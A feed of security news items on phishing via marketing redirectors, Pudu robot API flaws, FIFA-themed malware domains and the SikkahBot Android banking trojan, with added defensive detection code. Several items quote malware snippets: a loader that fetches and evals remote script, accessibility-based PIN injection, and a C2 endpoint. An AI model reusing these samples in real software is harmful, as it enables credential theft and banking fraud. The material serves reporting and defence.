• Apple appears poised to remove the physical SIM card slot from its upcoming iPhone 17 models in more countries, with a significant rollout anticipated across the European Union. This change would mark the latest step in Apple’s long-term strategy of transitioning to the more secure and flexible eSIM technology, a move already implemented in the […]

    The post Apple May Drop Physical SIM Card in iPhone 17 appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

  • Cybersecurity today is less about single attacks and more about chains of small weaknesses that connect into big risks. One overlooked update, one misused account, or one hidden tool in the wrong hands can be enough to open the door. The news this week shows how attackers are mixing methods—combining stolen access, unpatched software, and clever tricks to move from small entry points to large

  • A high-severity vulnerability in SUSE’s Fleet, a GitOps management tool for Kubernetes clusters, has been disclosed by security researcher samjustus via GitHub Security Advisory GHSA-6h9x-9j5v-7w9h. The vulnerability, tracked as CVE-2024-52284, allows Helm chart values—often containing sensitive credentials—to be stored inside BundleDeployment resources in plain text, exposing them to any user with GET or LIST permissions. […]

    The post SUSE Fleet: Plain Text Storage of Vulnerability Exploit Helm Values appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

  • A critical client-side remote code execution (RCE) vulnerability in Google Web Designer exposed Windows users to full system compromise, according to a detailed write-up by security researcher Balint Magyar. Affecting versions prior to 16.4.0.0711 (released July 29, 2025), the flaw allowed attackers to inject malicious CSS into a configuration file and leverage an internal API […]

    The post Google Web Designer Vulnerability Lets Hackers Take Over Client Systems appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

  • Cybercriminals are increasingly exploiting legitimate email marketing platforms to launch sophisticated phishing campaigns, leveraging the trusted reputation of these services to bypass security filters and deceive victims.

    This emerging threat vector represents a significant evolution in phishing tactics, where attackers abuse click-tracking domains and URL redirection services provided by established email marketing companies to mask their malicious intentions.

    The campaigns utilize platforms such as Klaviyo’s ‘klclick3.com’ and Drip Global’s ‘dripemail2.com’ domains, which are legitimate click-tracking services designed to monitor user interactions with marketing emails.

    By routing malicious URLs through these trusted domains, attackers create a veneer of legitimacy that helps their phishing emails evade detection by traditional security systems.

    The technique is particularly insidious because it exploits the inherent trust users place in recognized marketing platforms.

    Recent analysis reveals that these campaigns often employ sophisticated lures, including fake voicemail notifications, DocuSign document requests, and payment-related messages.

    Phishing email sample that uses voicemail as a lure (Source – Trustwave)

    The attackers demonstrate remarkable adaptability, combining traditional phishing techniques with modern evasion methods including CAPTCHA verification, compromised domains, and abuse of cloud services like Amazon Web Services and Cloudflare.

    Trustwave researchers identified a significant increase in phishing URLs containing familiar patterns and similar phishing templates, noting the resurgence in abuse of email marketing platforms alongside widespread use of URL redirectors.

    Their PageML system, which combines machine learning components with URL intelligence frameworks, has been instrumental in detecting these evolving threats in real-time.

    Advanced Redirection and Evasion Techniques

    The technical sophistication of these campaigns is evident in their multi-layered redirection mechanisms.

    In one documented case, attackers used a Base64-encoded redirection scheme where the initial phishing URL contained encoded strings that, when decoded, revealed the actual malicious destination.

    Phishing email sample that also contains a fake remittance image (Source – Trustwave)

    The source code analysis showed:

    ucis.RedirectUrl = "aHR0cHM6Ly9vZmZpY21hc2RpbmRvbW1qZW9haWV1bnQuZXN6a3FlaHJoeXpkdXF2d3JiZ3h1dWd4YXF1bXJtLmlwLWRkbnMuY29tL2YvNFNTd08yUU5LQ3B5MWdDeEtzX0w=";
    ucis.RedirectUrl = atob(ucis.RedirectUrl); // decode to real URL
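As an added illustration (not Trustwave's PageML code and not from the article), the following Python performs the unwrapping a reviewer would otherwise do by hand: it takes a click-tracking link, looks in its query values and path segments for a plain or Base64-encoded URL (the `atob()` step shown above), and follows it statically, without fetching anything, so the real destination host can be compared with the trusted first hop. The tracker host list, the `upn` parameter name, the hop limit and the sample link are constructed assumptions, not Klaviyo's or Drip's link format.

```python
import base64
import binascii
from urllib.parse import parse_qs, quote, urlparse

# Click-tracking hosts named in the article; a real deployment would load a fuller list.
CLICK_TRACKING_HOSTS = {"klclick3.com", "dripemail2.com"}
MAX_HOPS = 5  # constructed bound; stops pathological chains


def decode_b64_url(value):
    """Return the decoded string if `value` is Base64 that decodes to an http(s) URL, else None.
    Mirrors the atob() step in the page's snippet, but tolerates stripped padding."""
    if not value or len(value) % 4 == 1:  # no amount of padding can repair this length
        return None
    padded = value + "=" * (-len(value) % 4)
    try:
        decoded = base64.b64decode(padded, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return decoded if decoded.startswith(("http://", "https://")) else None


def unwrap_redirect(url):
    """Statically unwrap a redirector URL: look in query values and path segments for a
    plain or Base64-encoded URL and follow it, without making any network request."""
    hops = [url]
    for _ in range(MAX_HOPS):
        parsed = urlparse(hops[-1])
        candidates = [v for values in parse_qs(parsed.query).values() for v in values]
        candidates += [seg for seg in parsed.path.split("/") if seg]
        next_url = None
        for cand in candidates:
            if cand.startswith(("http://", "https://")):
                next_url = cand
            else:
                next_url = decode_b64_url(cand)
            if next_url:
                break
        if next_url is None:
            break
        hops.append(next_url)
    return hops


def assess(url):
    """Summarise where a link really goes and whether it rides on a trusted click-tracker."""
    hops = unwrap_redirect(url)
    first_host = (urlparse(hops[0]).hostname or "").lower()
    final_host = (urlparse(hops[-1]).hostname or "").lower()
    via_tracker = any(first_host == h or first_host.endswith("." + h) for h in CLICK_TRACKING_HOSTS)
    return {
        "hops": hops,
        "final_host": final_host,
        "via_click_tracker": via_tracker,
        # A tracker link whose embedded destination lands outside the tracker domain deserves review.
        "suspicious": via_tracker and len(hops) > 1 and final_host != first_host,
    }


# Constructed sample: a tracker-style link carrying a Base64-encoded destination in the
# hypothetical "upn" parameter (the parameter name is an assumption, not Klaviyo's format).
SAMPLE_DESTINATION = "https://login-example.invalid/verify"
SAMPLE_ENCODED = base64.b64encode(SAMPLE_DESTINATION.encode()).decode()
SAMPLE_URL = f"https://klclick3.com/ls/click?upn={quote(SAMPLE_ENCODED, safe='')}"

if __name__ == "__main__":
    print(assess(SAMPLE_URL))
```

Run as a script it prints the assessment of the constructed sample. In a mail gateway the same `assess()` result is the input to a rule such as "tracker link whose embedded destination is a host this tenant's marketing traffic has never visited", which is the behavioural signal the article says reputation-based blocklists miss.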

    Additionally, attackers implement anti-analysis measures by disabling right-click functionality through JavaScript event listeners:

    addEventListener("contextmenu", function(e) {
        e.preventDefault();
    });

    The campaigns also employ chameleon phishing techniques, dynamically fetching company information and logos using services like Clearbit to create personalized phishing pages that appear legitimate to specific victims.

    These pages often integrate Cloudflare Turnstile for human verification, adding another layer of evasion while appearing to provide security measures.

    Human verification CAPTCHA (Source – Trustwave)

    The abuse of legitimate infrastructure creates significant challenges for cybersecurity teams, as traditional blacklisting approaches become ineffective when malicious content is hosted on trusted domains.

    This trend underscores the need for advanced behavioral analysis and machine learning-based detection systems capable of identifying malicious intent regardless of the hosting infrastructure’s reputation.

    The post Hackers Abuse Legitimate Email Marketing Platforms to Disguise Malicious Links appeared first on Cyber Security News.

  • You may have seen them in restaurants, cat-faced robots gliding between tables, delivering plates of food. These robots, many of them made by Pudu Robotics, the world’s largest commercial service robotics company, are part of a growing fleet of automated helpers in our daily lives.

    From the well-known BellaBot to cleaning and disinfection robots, Pudu’s machines operate in restaurants, hospitals, hotels, and offices worldwide, serving millions of people. But a recent discovery revealed a startling vulnerability: these robots could be controlled by anyone with a little technical know-how.

    Cybersecurity researcher “BobDaHacker” discovered that Pudu’s robot management APIs had a critical flaw: they lacked proper authentication checks.

    While a valid authentication token was required, the system failed to verify whether the user had the necessary permissions to control the robots. This oversight meant that virtually any Pudu robot, whether a BellaBot in a restaurant or a FlashBot in a corporate office, was exposed.

    The vulnerabilities allowed unauthorized users to:

    • View the call history of any robot.
    • Create new tasks and control robots that they did not own.
    • Update robot settings, including their names and behaviors.
    • List all robots associated with any store globally.
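The flaw described here is a missing object-level authorization check: the token proves who is calling, not whether the caller may act on the requested robot. The following Python is an added example with constructed users, tokens, stores and robots (nothing in it is Pudu's API); it contrasts the vulnerable handler with one that checks ownership on every request and scopes listing to the caller's own stores.

```python
from dataclasses import dataclass, field


class AuthError(Exception):
    """Token missing or invalid (authentication)."""


class PermissionDenied(Exception):
    """Caller is authenticated but may not act on this resource (authorization)."""


@dataclass(frozen=True)
class Principal:
    user_id: str
    store_ids: frozenset  # stores this account administers


@dataclass
class Robot:
    robot_id: str
    store_id: str
    name: str
    tasks: list = field(default_factory=list)


# Constructed fixtures: hypothetical tokens, users, stores and robots.
TOKENS = {
    "tok-alice": Principal("alice", frozenset({"store-1"})),
    "tok-mallory": Principal("mallory", frozenset({"store-2"})),
}
ROBOTS = {
    "bella-01": Robot("bella-01", "store-1", "BellaBot"),
    "flash-07": Robot("flash-07", "store-2", "FlashBot"),
}


def authenticate(token):
    """Step 1: who is calling? A valid token yields a Principal; anything else is AuthError."""
    try:
        return TOKENS[token]
    except KeyError:
        raise AuthError("invalid token") from None


def create_task_vulnerable(token, robot_id, task):
    """The flawed pattern: the token is checked, ownership never is."""
    authenticate(token)          # any valid account passes
    robot = ROBOTS[robot_id]     # no check that the robot belongs to the caller's store
    robot.tasks.append(task)
    return robot


def authorize_robot(principal, robot_id):
    """Step 2: may this principal act on this robot? Object-level check on every request."""
    robot = ROBOTS.get(robot_id)
    # Same error for "unknown" and "not yours", so callers cannot enumerate robot ids.
    if robot is None or robot.store_id not in principal.store_ids:
        raise PermissionDenied("robot not accessible")
    return robot


def create_task_fixed(token, robot_id, task):
    principal = authenticate(token)
    robot = authorize_robot(principal, robot_id)
    robot.tasks.append(task)
    return robot


def list_robots_fixed(token, store_id):
    """Scope listing to stores the caller administers instead of 'any store globally'."""
    principal = authenticate(token)
    if store_id not in principal.store_ids:
        raise PermissionDenied("store not accessible")
    return [r for r in ROBOTS.values() if r.store_id == store_id]


def can_control(token, robot_id):
    """True only if authentication and authorization both succeed."""
    try:
        authorize_robot(authenticate(token), robot_id)
        return True
    except (AuthError, PermissionDenied):
        return False


if __name__ == "__main__":
    print("vulnerable:", create_task_vulnerable("tok-mallory", "bella-01", "deliver to table 9").tasks)
    print("fixed, alice:", can_control("tok-alice", "bella-01"))
    print("fixed, mallory:", can_control("tok-mallory", "bella-01"))
```

The point of `authorize_robot()` taking the principal rather than the raw token is that the ownership decision is made from an identity the server has already established, in one place, for every robot-scoped endpoint (call history, tasks, settings, listing); an endpoint that forgets to call it fails closed only if the framework makes that the default, which is the review question to ask of any fleet-management API.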

    The potential for misuse was vast and alarming. In a restaurant setting, a hacker could reroute a BellaBot to deliver food to their own table instead of the correct one, cancel all robot tasks during a busy dinner service, or create chaos by having robots circle the dining room playing music.

    robots settings (image)

    The implications extended far beyond restaurants. Pudu’s FlashBot, equipped with arms and the ability to use elevators, could be remotely controlled to access confidential documents in an office, navigate to a different floor, and deliver them to an unauthorized individual.

    In a more disruptive scenario, an attacker could hold an entire fleet of robots hostage, demanding a ransom to restore normal operations. The attacker could even display a QR code for payment on the robots’ screens.

    The risks were particularly concerning in healthcare environments. Pudu robots are used in hospitals for delivering medicine and for cleaning and disinfection.

    A malicious actor could redirect medicine deliveries, send cleaning robots into sterile operating rooms, or program disinfection robots to skip critical areas, posing a direct threat to patient safety.

    After discovering these flaws, the researcher attempted to report them to Pudu Robotics on August 12. Emails to the company’s sales, support, and tech teams went unanswered.

    A follow-up email to over 50 staff members on August 21 also received no reply. For weeks, the vulnerabilities remained unaddressed while the robots continued to operate in sensitive environments.

    Frustrated by the lack of response, the researcher took what they termed the “nuclear option.” They contacted some of Pudu’s largest customers, including Skylark Holdings, which operates over 7,000 restaurants in Japan, and Zensho, another major restaurant chain operator. The researcher explained that anyone could control the robots in their facilities.

    Within 48 hours of these customers being notified, Pudu Robotics sent a response that appeared to be AI-generated, thanking the researcher for their “responsible disclosure” and stating that their security team had “promptly investigated the issue.”

    The response even included a placeholder for the sender’s email address, suggesting a hasty and templated reply. Two days later, all the reported vulnerabilities were fixed.

    As these robots become more integrated into our lives, operating around vulnerable populations in hospitals, schools, and a variety of public spaces, ensuring their security is not just a technical necessity but a fundamental responsibility.

    The post Food Delivery Robots can be Hacked to Deliver Meals to Your Table Instead of the Intended Customers appeared first on Cyber Security News.

  • Security researchers have observed an unprecedented surge in domain registrations in recent months, closely tied to the upcoming 2026 FIFA World Cup tournament.

    These domains, often masquerading as legitimate ticketing portals, merchandise outlets, or live-stream platforms, serve as precursors to a multifaceted cyber campaign designed to harvest credentials, distribute malware, and siphon financial data.

    Attackers are leveraging the high-profile nature of the event, registering deceptive domains up to eighteen months in advance to avoid detection and establish credibility among unsuspecting fans.

    Fake website using a variety of logos and the native language of one of the host countries to promote the sale of FIFA WC26 tickets (Source – BeforeAI)

    As interest in match schedules and ticket availability peaks, visitors are lured into interacting with these fraudulent websites, unknowingly initiating the infection chain.

    BeforeAI analysts identified a cluster of over 498 suspicious domains containing terms such as “fifa,” “worldcup,” and host city names, with registrations peaking in August 2025.

    Registrar distribution of suspicious domains (Source – BeforeAI)

    These domains are distributed across top registrars including GoDaddy.com and Namecheap, as well as low-friction TLDs like .online and .shop.

    In many cases, threat actors repurpose aged domains previously registered for other sporting events, further complicating attribution and takedown efforts.

    The registration of domains anchored to future tournaments in 2030 and 2034 highlights the long-term strategy employed by these cybercriminal groups.

    The impact of this preparatory activity extends beyond simple phishing attempts. Victims who input personal details on these sites may be redirected to payload delivery servers hosting trojan droppers capable of evading signature-based detection.

    Mandarin-based websites promoting multiple threats for a page titled as FIFA World Cup Schedule (Source – BeforeAI)

    Initial reconnaissance indicates that the malware leverages polymorphic loaders to modify its decryption routines on each execution, thwarting static analysis.

    Command-and-control (C2) communications occur over HTTPS to blend with legitimate traffic, while fallback DNS tunnels allow for data exfiltration even if primary channels are disrupted.

    Infection Mechanism and Persistence Tactics

    Delving deeper into the infection mechanism reveals a staged process beginning with a malicious JavaScript injected into compromised landing pages.

    When unsuspecting users visit URLs like watchfootball-live.com, the script checks the browser environment and delivers a second-stage payload only if specific conditions are met, such as running outdated browser plugins. This selective delivery reduces exposure to sandbox analysis.

    The following snippet demonstrates how the script computes a time-based hash to retrieve the payload URL:

    (function() {
        const key = "WorldCup2026";
        const now = Math.floor(Date.now() / 3600000);   // hour counter since the epoch
        const hash = btoa(unescape(encodeURIComponent(key + now))).substr(0, 16);
        fetch(`https://${hash}.cdn-delivery.net/payload.js`)
            .then(response => response.text())         // body of the second-stage script
            .then(eval);
    })();
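To turn the snippet above into detection logic, here is an added Python example (not BeforeAI's tooling) that reproduces the label computation and matches the predicted hostnames against constructed resolver log lines. Working through it surfaces a caveat worth knowing before building an hourly-rotating blocklist: Base64 emits four characters per three input bytes, so `substr(0, 16)` covers exactly the twelve bytes of `"WorldCup2026"` and the appended hour never influences the label, which means the loader contacts the same hostname every hour. The log format, client addresses and timestamps are constructed assumptions.

```python
import base64

KEY = "WorldCup2026"                 # key hard-coded in the loader snippet above
PARENT_DOMAIN = "cdn-delivery.net"   # parent domain used in the loader snippet above


def js_btoa_utf8(text):
    """Python equivalent of btoa(unescape(encodeURIComponent(text))): Base64 of the UTF-8 bytes."""
    return base64.b64encode(text.encode("utf-8")).decode("ascii")


def hourly_label(epoch_seconds):
    """The label the loader derives at a given time: first 16 chars of btoa(KEY + hour)."""
    hour = epoch_seconds // 3600  # Math.floor(Date.now() / 3600000)
    return js_btoa_utf8(KEY + str(hour))[:16]


def labels_for_window(start_epoch, hours=48):
    """All distinct labels over a window of hours. Base64 yields 4 characters per 3 input
    bytes, so 16 characters encode exactly the first 12 bytes, i.e. KEY itself; the hour
    counter sits after that and never reaches the label."""
    return {hourly_label(start_epoch + h * 3600) for h in range(hours)}


def loader_hostnames(start_epoch, hours=48):
    """Fully qualified names for a blocklist or for matching in resolver logs, lower-cased
    because DNS names are case-insensitive."""
    return {f"{label}.{PARENT_DOMAIN}".lower() for label in labels_for_window(start_epoch, hours)}


def find_loader_queries(dns_log_lines, start_epoch, hours=48):
    """Return the log lines whose query= field names a predicted loader hostname."""
    wanted = loader_hostnames(start_epoch, hours)
    hits = []
    for line in dns_log_lines:
        for token in line.split():
            if token.startswith("query="):
                qname = token[len("query="):].rstrip(".").lower()
                if qname in wanted:
                    hits.append(line)
    return hits


# Constructed resolver log lines in a hypothetical key=value format (not from the article).
SAMPLE_DNS_LOG = [
    "2025-08-14T10:01:22Z client=10.0.0.5 query=v29ybgrddxaymdi2.cdn-delivery.net type=A",
    "2025-08-14T10:01:23Z client=10.0.0.5 query=watchfootball-live.com type=A",
    "2025-08-14T10:02:10Z client=10.0.0.9 query=updates.example.com type=AAAA",
]

if __name__ == "__main__":
    print(sorted(loader_hostnames(1_755_000_000)))
    print(find_loader_queries(SAMPLE_DNS_LOG, 1_755_000_000))
```

The practical consequence is that one exact-match indicator for the `cdn-delivery.net` label suffices here; the window logic in `labels_for_window()` is kept so the same code still works if a later variant moves the key after the counter or hashes the concatenation, at which point the set it returns genuinely grows by one entry per hour.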

    Once executed, the payload writes a small loader to the Windows Registry under HKCU\Software\Microsoft\Windows\CurrentVersion\Run to achieve persistence.

    It then downloads additional modules disguised as harmless image files, which are in fact encrypted executables unpacked in memory and injected into legitimate processes such as svchost.exe.

    By employing reflective DLL injection, the malware avoids dropping components to disk, significantly reducing forensic footprints.

    The sophisticated use of aged domains, combined with polymorphic and in-memory techniques, underscores the evolving threat landscape as the world gears up for the 2026 FIFA World Cup.

    Continuous monitoring and proactive domain blacklisting will be crucial to safeguard fans and organizations from this looming cyberattack.

    The post Hackers Registering Domains to Launch Cyberattack Targeting 2026 FIFA World Cup Tournament appeared first on Cyber Security News.

  • A sophisticated malvertising campaign has emerged that specifically targets hoteliers and vacation rental operators by impersonating well-known service providers. Okta Threat Intelligence reports that attackers have used malicious search engine advertisements—particularly sponsored ads on Google Search—to lure unsuspecting hospitality professionals to counterfeit login portals. The ultimate goal: harvesting credentials for cloud-based property management and guest […]

    The post Phishing Campaign Exploits Ads to Breach Hotel Property Management Systems appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

  • As enterprises continue to shift their operations to the browser, security teams face a growing set of cyber challenges. In fact, over 80% of security incidents now originate from web applications accessed via Chrome, Edge, Firefox, and other browsers. One particularly fast-evolving adversary, Scattered Spider, has made it their mission to wreak havoc on enterprises by specifically targeting

  • A sophisticated Android malware campaign has emerged in recent months, targeting students in Bangladesh by masquerading as legitimate scholarship applications.

    Disguised under the guise of the Bangladesh Education Board, these fraudulent apps promise financial aid and entice unsuspecting users to download APKs from shortened URLs.

    Once installed, the malware covertly harvests personal and financial information, intercepts SMS messages, and even abuses device permissions to conduct unauthorized banking transactions.

    Its low detection rate on VirusTotal suggests that threat actors behind this campaign have invested considerable effort in evading traditional security controls.

    Initial distribution relies heavily on smishing campaigns, where students receive SMS links that redirect them to malicious APK hosting sites such as appsloads.top and downloadapp.website.

    The lure of a scholarship application, complete with official logos and academic terminology, lowers users’ guard and increases the likelihood of installation.

    After installation, the app prompts victims to sign in via Google or Facebook and enter sensitive details including full name, department, and institute affiliation.

    Cyble analysts noted that this early stage of social engineering is critical to building trust and collecting the information required for subsequent attacks.

    Following credential harvesting, the malware advances to request high-risk permissions, including Accessibility Service, SMS access, overlay, and call management rights.

    Researchers identified that once these permissions are granted, the app registers an SMSBroadcastReceiver to capture incoming texts containing keywords associated with major Bangladeshi banks (e.g., “bkash,” “NAGAD,” “MYGP”) and specific USSD service codes.

    The intercepted messages are then forwarded to a Firebase-hosted command and control (C2) server, enabling remote attackers to coordinate further malicious activities.

    Upon successful permission escalation, SikkahBot shifts into its most dangerous phase: automated banking transactions.

    Exploiting the Accessibility Service, the malware continuously monitors foreground applications and, when detecting targeted banking apps such as bKash, Nagad, or Dutch-Bangla Bank, retrieves one-time PINs from the C2 server.

    A brief code snippet illustrates the process of injecting user input:

    // Locate the focused input field in the foreground app, write the PIN
    // obtained from the C2 server into it, then trigger the click action.
    AccessibilityNodeInfo node = rootNode.findFocus(AccessibilityNodeInfo.FOCUS_INPUT);
    Bundle args = new Bundle();
    args.putCharSequence(AccessibilityNodeInfo.ACTION_ARGUMENT_SET_TEXT_CHARSEQUENCE, pin);
    node.performAction(AccessibilityNodeInfo.ACTION_SET_TEXT, args);
    node.performAction(AccessibilityNodeInfo.ACTION_CLICK);

    This routine allows automated login without user interaction.

    Dialing USSD code (Source – Cyble)

    If banking apps are inactive, the malware executes USSD codes received from the server, filling input fields and invoking buttons labeled “SEND” or “OK” within the USSD dialog to initiate fund transfers without an active internet connection (see Figure 8 – Dialing USSD code).

    Infection Mechanism and Persistence

    SikkahBot’s infection mechanism is a blend of social engineering and stealthy permission abuse.

    After the initial APK installation, the malware copies its APK file to a hidden directory and registers as a device administrator, ensuring that uninstallation attempts prompt administrative lock notifications.

    It injects receiver components into the AndroidManifest.xml to persist across reboots, and periodically contacts the Firebase C2 endpoint at https://update-app-sujon-default-rtdb.firebaseio.com to fetch new modules.

    Old Vs. New variant comparison (Source – Cyble)

    By abusing the Accessibility Service, the malware can re-enable its own services if they are disabled by security-conscious users.

    The combination of persistent device administrator rights, manifest-declared receivers, and periodic C2 polling makes SikkahBot exceptionally resilient against removal and detection.
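Both the permission set requested after credential harvesting and the manifest-declared receivers used for persistence are visible statically, before the app is ever run. The following Python is an added example (not Cyble's analysis tooling) that scores an AndroidManifest.xml for the combination this article describes: SMS permissions together with an SMS_RECEIVED receiver, a service guarded by BIND_ACCESSIBILITY_SERVICE, a device-admin receiver, and a BOOT_COMPLETED receiver. The weights, the threshold and both sample manifests are constructed; the sample package and component names are hypothetical, reusing only the SMSBroadcastReceiver name mentioned above.

```python
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"  # namespace of android:* attributes

# Indicator weights are constructed for this example; the indicators themselves are the
# permission and component patterns described in the article.
PERMISSION_WEIGHTS = {
    "android.permission.RECEIVE_SMS": 3,
    "android.permission.READ_SMS": 2,
    "android.permission.SEND_SMS": 2,
    "android.permission.SYSTEM_ALERT_WINDOW": 2,  # overlay
    "android.permission.CALL_PHONE": 2,           # USSD dialling
}
COMPONENT_PERMISSION_WEIGHTS = {
    "android.permission.BIND_ACCESSIBILITY_SERVICE": 4,
    "android.permission.BIND_DEVICE_ADMIN": 3,
}
ACTION_WEIGHTS = {
    "android.provider.Telephony.SMS_RECEIVED": 3,
    "android.app.action.DEVICE_ADMIN_ENABLED": 3,
    "android.intent.action.BOOT_COMPLETED": 1,
}
COMBINATION_BONUS = 5


def analyze_manifest(manifest_xml):
    """Score an AndroidManifest.xml string; returns (score, list of findings)."""
    root = ET.fromstring(manifest_xml)
    score, findings = 0, []

    for el in root.iter("uses-permission"):
        name = el.get(ANDROID + "name", "")
        if name in PERMISSION_WEIGHTS:
            score += PERMISSION_WEIGHTS[name]
            findings.append(f"uses-permission {name}")

    for tag in ("service", "receiver"):
        for comp in root.iter(tag):
            comp_name = comp.get(ANDROID + "name", "?")
            perm = comp.get(ANDROID + "permission", "")
            if perm in COMPONENT_PERMISSION_WEIGHTS:
                score += COMPONENT_PERMISSION_WEIGHTS[perm]
                findings.append(f"{tag} {comp_name} guarded by {perm}")
            for action in comp.iter("action"):
                act = action.get(ANDROID + "name", "")
                if act in ACTION_WEIGHTS:
                    score += ACTION_WEIGHTS[act]
                    findings.append(f"{tag} {comp_name} listens for {act}")

    # The triad behind the behaviour above: read OTP SMS, drive the UI, resist uninstall.
    has_sms = any("SMS" in f for f in findings)
    has_a11y = any("BIND_ACCESSIBILITY_SERVICE" in f for f in findings)
    has_admin = any("BIND_DEVICE_ADMIN" in f for f in findings)
    if has_sms and has_a11y and has_admin:
        score += COMBINATION_BONUS
        findings.append("combination: SMS interception + accessibility service + device admin")
    return score, findings


def verdict(score, threshold=8):
    """Threshold is a constructed tuning knob, not an industry value."""
    return "high-risk" if score >= threshold else "low-risk"


# Constructed manifest shaped like the behaviour described above (hypothetical package name).
MALICIOUS_MANIFEST = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.scholarship">
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
  <uses-permission android:name="android.permission.CALL_PHONE"/>
  <uses-permission android:name="android.permission.INTERNET"/>
  <application android:label="Scholarship">
    <receiver android:name=".SMSBroadcastReceiver" android:exported="true">
      <intent-filter android:priority="999">
        <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
      </intent-filter>
    </receiver>
    <receiver android:name=".AdminReceiver" android:permission="android.permission.BIND_DEVICE_ADMIN">
      <intent-filter><action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/></intent-filter>
    </receiver>
    <receiver android:name=".BootReceiver">
      <intent-filter><action android:name="android.intent.action.BOOT_COMPLETED"/></intent-filter>
    </receiver>
    <service android:name=".AccessService" android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
      <intent-filter><action android:name="android.accessibilityservice.AccessibilityService"/></intent-filter>
    </service>
  </application>
</manifest>
"""

# Constructed benign manifest for comparison.
BENIGN_MANIFEST = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.notes">
  <uses-permission android:name="android.permission.INTERNET"/>
  <application android:label="Notes"/>
</manifest>
"""

if __name__ == "__main__":
    for label, xml in (("scholarship", MALICIOUS_MANIFEST), ("notes", BENIGN_MANIFEST)):
        score, findings = analyze_manifest(xml)
        print(label, score, verdict(score), findings)
```

The combination bonus is the part worth keeping when tuning weights: a legitimate SMS app needs RECEIVE_SMS and an accessibility tool needs BIND_ACCESSIBILITY_SERVICE, but an app that asks for both and also registers itself as device administrator has assembled exactly the capability set the article attributes to SikkahBot, regardless of what its icon promises.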

    The post Beware of Fraudulent Scholarship Apps Attacking Students in Defraud Campaign appeared first on Cyber Security News.
